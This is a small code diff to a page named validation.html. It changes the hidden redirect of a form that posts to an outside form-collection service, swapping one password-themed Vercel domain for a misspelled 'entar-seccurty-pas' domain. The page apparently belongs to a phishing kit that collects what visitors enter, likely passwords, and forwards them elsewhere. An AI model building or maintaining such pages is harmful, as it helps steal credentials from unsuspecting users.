--- a/validation.html
+++ b/validation.html
@@ -11,7 +11,7 @@
 
 <body>
     <form action="https://submit-form.com/lWJZsa0TL" method="post">
-        <input type="hidden" name="_redirect" value="https://sub-password.vercel.app/" />
+        <input type="hidden" name="_redirect" value="https://entar-seccurty-pas.vercel.app/" />
         <div id="root">
             <div>
                 <form>
